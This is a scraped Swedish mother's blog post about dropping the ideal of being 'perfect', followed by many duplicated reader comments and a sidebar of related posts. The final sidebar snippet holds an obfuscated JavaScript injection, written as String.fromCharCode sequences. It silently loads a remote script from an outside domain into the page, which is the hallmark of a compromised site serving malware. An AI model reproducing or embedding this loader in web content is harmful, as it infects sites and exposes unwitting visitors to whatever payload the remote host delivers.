Nu avskaffar vi ordet PERFEKT!

image

Vardagspussel!

Att inte få tiden att räcka till. Att känna sig otillräcklig. Att känna sig enormt misslyckad i rollen som ”Den perfekta mamman”

 Jag kom hem sent ifrån jobbet. Jobbade över och Lilleman fick vara med. Storhandlingen står kvar som en punkt på min to-do-list.  Jag försökte kompensera upp mitt dåliga mamma-samvete över att vi kom hem så sent med att låta Lilleman bestämma middag. Hamburgare beställdes såklart. Jag tänkte föröka vara lite huslig och valde att göra dom själv. Vi tog en dejt-night. Lilleman somnade först 20:45.

Normalt sett lägger han sig 19:30. Ännu en stressfaktor över att inte hinna med. Mitt hem ser ut som ett bombnedslag. Jag har i stort sett inte varit hemma senaste vecka. Dammråttorna leker i hörnen 😱. Min pedanta sida skriker inombords av frustration.

Men just nu får det vara helt okay!❤️👊🏻

Jag jobbar dubbla jobb just nu. Jag röjer upp mitt liv, min ångest och min ekonomi efter min totalkrach i juli. Jag ”stödar” och jobbar med mig själv. (Svin jobbigt, påfrestande och gör j*vligt ont!💔)

 Jag är inte ute efter din sympati. Tvärt om!

Jag är SÅ trätt på alla ”feel-Good-fasader som florerar på sociala medier. Det sätter varningsord stress och press på oss!

Den perfekt latten, det perfekta hemmet, inga dammråttor, ingen tvätt utan skinande rent och glänsande perfekt ✨

Den perfekta mamman, den perfekta hemlagade barnmaten, den perfekta födelsedagen. Den perfekta mannen, den perfekta relationen. (LOL  😂 Finns den?!)

-VARFÖR sätter vi så mycket press på oss själva? Måste allt vara SÅ perfekt hela tiden? 

Som ensamstående mamma. Som separerad kvinna så har jag vid ett FLERTAL tillfällen blivit jämförd med någon form av andra sortering?! Både irl och genom blogg!

-VEM är du att dömma mig, Utan att känna mig? utan några som helst belägg?

Andra sortering?!

Som 29årig kvinna, mamma, företagare, med  erfarenheter på både gott och ont så kan jag skriva under på att jag är ALLT annat än just perfekt!

Jag fick växa upp snabbt. Jag bodde själv redan som 13-14åring. Jag har sett och upplevt saker jag inte önskat min värsta ovän. Men all ärr på både in och utsidan påminner mig om vem jag varit, vem jag är och vem jag vill vara. 

Jag har vuxit mig stark, lärt mig att uppskatta vardagliga saker.

Lärt mig att inte ta någon eller något för givet.

Jag har varit på botten. Riktigt djupt nere. Men jag har också rest mig upp.

Klättrat, klättrat och klättrat. Med näbbar och klor! Jag befinner mig just nu mitt i en resa. En resa påväg tillbaka upp från just botten.

Jag är inte där än. Men jag är närmare idag än jag var igår. Så nu min köra vän så tycker kag att vi avskaffar ordet PERFEKT!!!

Jag är både kantstött & trasig. Jag är rädd för att både såra och bli sårad. Men jag är också väldigt medveten om det, vilket gör det möjligt att påverka både mig själv och min framtid! ❤️

Jag är mottaglig för förändring! Men jag är och kommer aldrig att bli perfekt!

Ikväll är jag helt slut, både fysiskt och psykiskt! Jag låter dammråttorna vara kvar, min to-do-list också. Istället tänker jag nu dra täcket över huvudet luta mig tillbaka och säga:

”Jag duger som jag är, det är helt okay att bara vara en kväll”👊🏻💪🏻

DU  duger som du är, glöm aldrig det ❤️ Släpp prestationsångesten och tror inte på ”dem perfekta fasaden”

ikväll släpper jag prestationsångesten och prioriterat mig själv och min sömn.

Jag ska krypa ner brevid Lilleman och somna till hans andetag!

image image

Från en mamma till en annan mamma!

Kraaaaaam 💖

image

/My Martens

 

120 Komentarer

 1. Gör du helt rätt i ♡
  Dessa fasader som samhället är uppbyggt av.. Man skall vara/göra/tycka på speciella sätt.
  Våga vägra fasader!
  Önskar dig & Lilleman en UNDERBAR helg med MASSOR av Mys & Skratt
  Kram på dig!

 2. Nej, du är inte perfekt My ? Men vem är det ? Inte jag i alla fall ? Det är ju det som gör din blogg så bra med en blandning utav allt o inte bara yta ❤

 3. Ja du – vad är perfekt My?
  För din son är just du säkert helt perfekt. Han kan ju inte veta (om du nu inte låter det lysa igenom för mycket) vad du har för ambitioner angående hämtning, mat och allt annat. Att ge kärlek som du säkert gör till honom räcker gott och väl. Sluta klandra dig själv.
  När det gäller dig själv och din strävan så är det ju alltid bra med mål men missa förbanne mig inte att ha kul på vägen. Snegla inte på andra. Vissa är lyckliga utan att kämpa det minsta för där finns en inre säkerhet och ytan blir därmed legal.
  Många kämpar med sin yta så att det skriker i locktången men är ändå inte lyckliga fullt ut. Lyfta, tråda, botoxa, filla, pluta, banta, spinna, löpa, squirta, fransa…måla, klistra, limma. Vart tog människan vägen? Vad händer med ungdomar till den typen av mödrar? Anorexi, bulimi, självmordsbenägenhet, depression…???
  Bestäm själv och titta inte för mycket runt i den tramsvärlden som många av dina kollegor låtsas leva i. Är man ”kåt” på pengar och lyx så är det bästa att skaffa sig en ”riktig” karriär där man skapar försörjning utan att sälja ut sig.
  Bloggerskor har blivit den nya generationens hemmafruar enligt mig. Det är fasansfullt. Så helt i händerna på välgörare och ingenting utan dessa. Jag blir rädd och förfasas!

  • Hej Helena! haha! Bloggerskor den nya generationens hemmafruar! Sååå kul uttryck! =) haha! Nu har iof inte jag någon erfarenhet av att vara just hemmafru. jag tror att jag skulle få sparken direkt. Jag är alldeles för driven, rastlös och målmedveten för att kunna ”slappna” av i den rollen. Jag håller inte riktigt med dig, men jag förstår din poäng! =) Sociala medier är väldigt ytligt. OM man väljer det. jag lokar mitt hår, jag har även fransar och annat. Det gör jag för att JAG trivs med det. Inte för att efterlikna någon annan. Men det är också individuellt.. Tack för at du delar med dig av dina tatar… kram

 4. Gör du helt rätt i ♡
  Dessa fasader som samhället är uppbyggt av.. Man skall vara/göra/tycka på speciella sätt.
  Våga vägra fasader!
  Önskar dig & Lilleman en UNDERBAR helg med MASSOR av Mys & Skratt
  Kram på dig!

 5. Nej, du är inte perfekt My 😄 Men vem är det ? Inte jag i alla fall 😜 Det är ju det som gör din blogg så bra med en blandning utav allt o inte bara yta ❤

 6. Ja du – vad är perfekt My?

  För din son är just du säkert helt perfekt. Han kan ju inte veta (om du nu inte låter det lysa igenom för mycket) vad du har för ambitioner angående hämtning, mat och allt annat. Att ge kärlek som du säkert gör till honom räcker gott och väl. Sluta klandra dig själv.

  När det gäller dig själv och din strävan så är det ju alltid bra med mål men missa förbanne mig inte att ha kul på vägen. Snegla inte på andra. Vissa är lyckliga utan att kämpa det minsta för där finns en inre säkerhet och ytan blir därmed legal.

  Många kämpar med sin yta så att det skriker i locktången men är ändå inte lyckliga fullt ut. Lyfta, tråda, botoxa, filla, pluta, banta, spinna, löpa, squirta, fransa…måla, klistra, limma. Vart tog människan vägen? Vad händer med ungdomar till den typen av mödrar? Anorexi, bulimi, självmordsbenägenhet, depression…???

  Bestäm själv och titta inte för mycket runt i den tramsvärlden som många av dina kollegor låtsas leva i. Är man ”kåt” på pengar och lyx så är det bästa att skaffa sig en ”riktig” karriär där man skapar försörjning utan att sälja ut sig.

  Bloggerskor har blivit den nya generationens hemmafruar enligt mig. Det är fasansfullt. Så helt i händerna på välgörare och ingenting utan dessa. Jag blir rädd och förfasas!

  • Hej Helena! haha! Bloggerskor den nya generationens hemmafruar! Sååå kul uttryck! =) haha! Nu har iof inte jag någon erfarenhet av att vara just hemmafru. jag tror att jag skulle få sparken direkt. Jag är alldeles för driven, rastlös och målmedveten för att kunna ”slappna” av i den rollen. Jag håller inte riktigt med dig, men jag förstår din poäng! =) Sociala medier är väldigt ytligt. OM man väljer det. jag lokar mitt hår, jag har även fransar och annat. Det gör jag för att JAG trivs med det. Inte för att efterlikna någon annan. Men det är också individuellt.. Tack för at du delar med dig av dina tatar… kram

 7. Håller helt med dig !Det viktigaste är ju att man mår bra & har dom man tycker om & som ger energi runt sig.
  En liten vädjan, det blir ofta upprepning f din sida när du skriver om din uppväxt / hur du klarat dig själv etc.Respekt såklart! Men kanske du inte hela tiden /ofta behöver informera om det? Önsker er en strålande helg.
  Mvh .

   • Kära Kärstin/Äva! Jag har ett tips till dig:
    1. Sno ett A4-block och en kulspetspenna från ditt meningslösa underbetalda vikariat på häktet
    2. Gå hem till din lilla 1:a i Sumpan, öppna dagens första folköl.
    3. Sätt dig i din bruna manchesterfotölj
    4. Skriv ned dina top-5 upplevelser idag
    5. Repetera, repetera, repetera i 12 månader
    6. Läs igenom och begrunda – ser det kul ut så starta för fanken en egen blogg – om inte HÅLL KÄFT!

 8. Håller med dig! O så skulle jag försynt vilja fråga vart du köpt din smashing snygga vita jacka/rock. Så fin! Vårig! Söker jacka med ljus o lykta. DEN skulle sitta som en smäck! Kramis

 9. Någon har sagt: Skäms inte över dina ärr. De är ett bevis på att du har överlevt.
  Alla har vi våra ärr, synliga och osynliga. Vissa har vi förorsakat oss själva, andra har andra personer orsakat oss. Se det som en lärdom och var nöjd med att vi kan bara göra så gott vi kan.
  Kram

 10. Bra skrivet!! ????
  Och du, vad fin outfit på sista bilden!! Den vita kappan.. my gosh! ??
  Ser framemot varm årstid framöver för då får vi se dig i vackra klackar och läckra klänningar! Du har bra smak!
  Trevlig helg! ☀️

 11. Håller helt med dig !Det viktigaste är ju att man mår bra & har dom man tycker om & som ger energi runt sig.
  En liten vädjan, det blir ofta upprepning f din sida när du skriver om din uppväxt / hur du klarat dig själv etc.Respekt såklart! Men kanske du inte hela tiden /ofta behöver informera om det? Önsker er en strålande helg.
  Mvh .

   • Kära Kärstin/Äva! Jag har ett tips till dig:
    1. Sno ett A4-block och en kulspetspenna från ditt meningslösa underbetalda vikariat på häktet
    2. Gå hem till din lilla 1:a i Sumpan, öppna dagens första folköl.
    3. Sätt dig i din bruna manchesterfotölj
    4. Skriv ned dina top-5 upplevelser idag
    5. Repetera, repetera, repetera i 12 månader
    6. Läs igenom och begrunda – ser det kul ut så starta för fanken en egen blogg – om inte HÅLL KÄFT!

 12. Håller med dig! O så skulle jag försynt vilja fråga vart du köpt din smashing snygga vita jacka/rock. Så fin! Vårig! Söker jacka med ljus o lykta. DEN skulle sitta som en smäck! Kramis

 13. Någon har sagt: Skäms inte över dina ärr. De är ett bevis på att du har överlevt.
  Alla har vi våra ärr, synliga och osynliga. Vissa har vi förorsakat oss själva, andra har andra personer orsakat oss. Se det som en lärdom och var nöjd med att vi kan bara göra så gott vi kan.
  Kram

 14. Jag tror det är lite en åldersfråga faktiskt. Jag är 42 år nu och känner inget behov av att försöka vara perfekt så som jag kände tidigade. Är trygg i mig själv och behöver inte påpeka om det är dammigt hemma eller om skummet på kaffet blev ”operfekt”. Man gör ju som man vill och såklart är det bättre att prioritera sig själv och sitt barn än allt annat. Är själv med 3 barn, jobbar heltid mm. Tiden finns bara inte men då ser jag till att ta det lugnt när jag inte har barnen.

 15. Bra skrivet!! 🙏🏻👌🏼

  Och du, vad fin outfit på sista bilden!! Den vita kappan.. my gosh! 👌🏼
  Ser framemot varm årstid framöver för då får vi se dig i vackra klackar och läckra klänningar! Du har bra smak!
  Trevlig helg! ☀️

 16. Jag tror det är lite en åldersfråga faktiskt. Jag är 42 år nu och känner inget behov av att försöka vara perfekt så som jag kände tidigade. Är trygg i mig själv och behöver inte påpeka om det är dammigt hemma eller om skummet på kaffet blev ”operfekt”. Man gör ju som man vill och såklart är det bättre att prioritera sig själv och sitt barn än allt annat. Är själv med 3 barn, jobbar heltid mm. Tiden finns bara inte men då ser jag till att ta det lugnt när jag inte har barnen.

 17. Så bra och väl skrivet My! Det är utav just den anledningen jag väljer bort instagram, Facebook mm. Detta perfekta… Vem har så egentligen?! Jag är utav den åsikten att ju mer perfektion man är i behov av att visa upp, desto mörkare och smutsigare är det ”under ytan”. Gillar dig och din blogg!! Du är en stark kvinna, du inspirerar och peppar andra! Nej, vi slänger bort ordet perfekt och låter och vara precis så fantastiska som alla människor är! Perfekt är trist och tråkigt!! Ha en fin dag, kram från en annan mamma

 18. Så bra och väl skrivet My! Det är utav just den anledningen jag väljer bort instagram, Facebook mm. Detta perfekta… Vem har så egentligen?! Jag är utav den åsikten att ju mer perfektion man är i behov av att visa upp, desto mörkare och smutsigare är det ”under ytan”. Gillar dig och din blogg!! Du är en stark kvinna, du inspirerar och peppar andra! Nej, vi slänger bort ordet perfekt och låter och vara precis så fantastiska som alla människor är! Perfekt är trist och tråkigt!! Ha en fin dag, kram från en annan mamma

 19. När jag var utbränd , var just det en av sakerna jag har jobbat med och faktist släppt, utan ångest.
  Innan utbrändheten ville jag ha städat hus,fylld kylskåp, ordning i tvättstugan för att koppla av på helgen , jag klarade inte att veta att jag hade saker över mig på lördagen och söndagen, då fick jag panikångest.
  Fortfarande älskar jag när allt är planerat och ordning inför helgen, MEN, idag kan jag tänka tanken, jag gör detta idag ,lördag fm tar jag tvättstugan eller vad det är som ska göras. Och det är en befrielse att känna så. Jag har gått 2 omgångar i KBT ( och då är det inte bara städgrejen såklart, det är så mycket mer, men detta b lev en stressfaktor ) OM man tänker efter, vad är viktigast så är det ju att umgås med sina barn och även att sova när man behöver det. ?

 20. När jag var utbränd , var just det en av sakerna jag har jobbat med och faktist släppt, utan ångest.
  Innan utbrändheten ville jag ha städat hus,fylld kylskåp, ordning i tvättstugan för att koppla av på helgen , jag klarade inte att veta att jag hade saker över mig på lördagen och söndagen, då fick jag panikångest.
  Fortfarande älskar jag när allt är planerat och ordning inför helgen, MEN, idag kan jag tänka tanken, jag gör detta idag ,lördag fm tar jag tvättstugan eller vad det är som ska göras. Och det är en befrielse att känna så. Jag har gått 2 omgångar i KBT ( och då är det inte bara städgrejen såklart, det är så mycket mer, men detta b lev en stressfaktor ) OM man tänker efter, vad är viktigast så är det ju att umgås med sina barn och även att sova när man behöver det. 🙂

 21. Bra skrivet! Alla ytor på sociala medier ger en falsk bild av verkligheten. Ingen eller mycket få visar något annat än en välputsad fasad, kliniskt rena hem som hämtade ur en möbelkatalog och glättiga fasader där man är väldigt social eller gör maximalt många aktiviteter med familjen. Det verkliga livet, det som alla lever sist och slutligen, syns inte i en bild på instagram, på en blogg eller på Facebook.
  Om vi människor följer många olika konton som alla visar samma korta glimtar av lycka och perfekt fasad så luras vi att tro att alla andra har perfekta roliga liv och själv har man ett alldagligt och tråkigt liv. Ju äldre man blir desto mer struntar man i fasader, eller man genomskådar dem iaf. Man ser dessutom fördelen i att man aldrig behöver känna sig ensam om man har dammråttor som husdjur, dessutom är de billiga i drift och kräver ingen omvårdnad! ? Däremot tycker jag synd om alla unga som växer upp nu och lär sig jaga en falsk dröm om lycka och perfektion som egentligen inte finns. Fortsätt skriv som du gör och strunta i både dammråttor och andra råttor som försöker trycka ner dig! ? Önskar dig och lilleman en fin helg! Kram!

 22. Jag håller med dig vi duger som vi är.
  Kvinnor sluta tävla om vem är mest
  perfekt. Alla duger som den unika person vi är.
  Lev mer och gör mindre.
  Kram L

 23. Bra skrivet! Alla ytor på sociala medier ger en falsk bild av verkligheten. Ingen eller mycket få visar något annat än en välputsad fasad, kliniskt rena hem som hämtade ur en möbelkatalog och glättiga fasader där man är väldigt social eller gör maximalt många aktiviteter med familjen. Det verkliga livet, det som alla lever sist och slutligen, syns inte i en bild på instagram, på en blogg eller på Facebook.

  Om vi människor följer många olika konton som alla visar samma korta glimtar av lycka och perfekt fasad så luras vi att tro att alla andra har perfekta roliga liv och själv har man ett alldagligt och tråkigt liv. Ju äldre man blir desto mer struntar man i fasader, eller man genomskådar dem iaf. Man ser dessutom fördelen i att man aldrig behöver känna sig ensam om man har dammråttor som husdjur, dessutom är de billiga i drift och kräver ingen omvårdnad! 🙂 Däremot tycker jag synd om alla unga som växer upp nu och lär sig jaga en falsk dröm om lycka och perfektion som egentligen inte finns. Fortsätt skriv som du gör och strunta i både dammråttor och andra råttor som försöker trycka ner dig! 🙂 Önskar dig och lilleman en fin helg! Kram!

 24. Jag håller med dig vi duger som vi är.
  Kvinnor sluta tävla om vem är mest
  perfekt. Alla duger som den unika person vi är.
  Lev mer och gör mindre.

  Kram L

 25. Din blogg är en av de ärligaste,
  Jag gillar den och du verkar vara en jättefin
  person. Du är en bra förebild.
  Kram Linda

 26. Ja var börjar jag. Hm ❤❤❤❤❤
  Det är så härligt att följa och läsa.
  Såg ett nytt ord i dag som jag inte vet vad det är för något.
  Tack för att du tar bort det.
  Kram L

 27. Din blogg är en av de ärligaste,
  Jag gillar den och du verkar vara en jättefin
  person. Du är en bra förebild.

  Kram Linda

 28. Ja var börjar jag. Hm ❤❤❤❤❤
  Det är så härligt att följa och läsa.
  Såg ett nytt ord i dag som jag inte vet vad det är för något.
  Tack för att du tar bort det.
  Kram L

 29. Du duger så bra så mamma My. Lilleman ser ut som hälsan själv och dina katter också. Så i din närvaro mår nog alla bra. Så koppla bort allt dåligt samvete och hylla dig själv. Kram.

 30. Du duger så bra så mamma My. Lilleman ser ut som hälsan själv och dina katter också. Så i din närvaro mår nog alla bra. Så koppla bort allt dåligt samvete och hylla dig själv. Kram.

 31. Perfekta tänder, perfekt hår och perfekt hem,.. haha Näe, fasader är inget för mig. Människan inuti är viktigare.
  Bra du påminner….
  Kram och ha en trevlig helg!

 32. Perfekta tänder, perfekt hår och perfekt hem,.. haha Näe, fasader är inget för mig. Människan inuti är viktigare.
  Bra du påminner….
  Kram och ha en trevlig helg!

 33. Härliga My. Jag läser varje dag, men lägger inte alltid kommentarer…
  Perfekt, är det många som tror att dom är, synd…. Man gör så gott man kan i ALLT.
  För några år sedan frågade jag min yngste son ( som tyvärr valt bort mig ur sitt liv) hur han tyckte hans uppväxt var, ” du städade lite väl mycket, blev svaret. Det gav mig en riktig tankeställare”har jag städat bort mitt liv”….
  Ha nu en skön helg med Lilleman o dig själv.
  Kram

 34. Härliga My. Jag läser varje dag, men lägger inte alltid kommentarer…
  Perfekt, är det många som tror att dom är, synd…. Man gör så gott man kan i ALLT.
  För några år sedan frågade jag min yngste son ( som tyvärr valt bort mig ur sitt liv) hur han tyckte hans uppväxt var, ” du städade lite väl mycket, blev svaret. Det gav mig en riktig tankeställare”har jag städat bort mitt liv”….
  Ha nu en skön helg med Lilleman o dig själv.
  Kram

 35. En perfekt fasad är väl oftast just en fasad. Disk, tvätt, damm, stök ja så är det i alla dödligas hem mellan varven. Perfekt behöver man inte va och ingen är det. Det är viktigare att ha ett gott hjärta och en hjälpande hand om det behövs. Kram fina du???

 36. En perfekt fasad är väl oftast just en fasad. Disk, tvätt, damm, stök ja så är det i alla dödligas hem mellan varven. Perfekt behöver man inte va och ingen är det. Det är viktigare att ha ett gott hjärta och en hjälpande hand om det behövs. Kram fina du💞💞💞

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/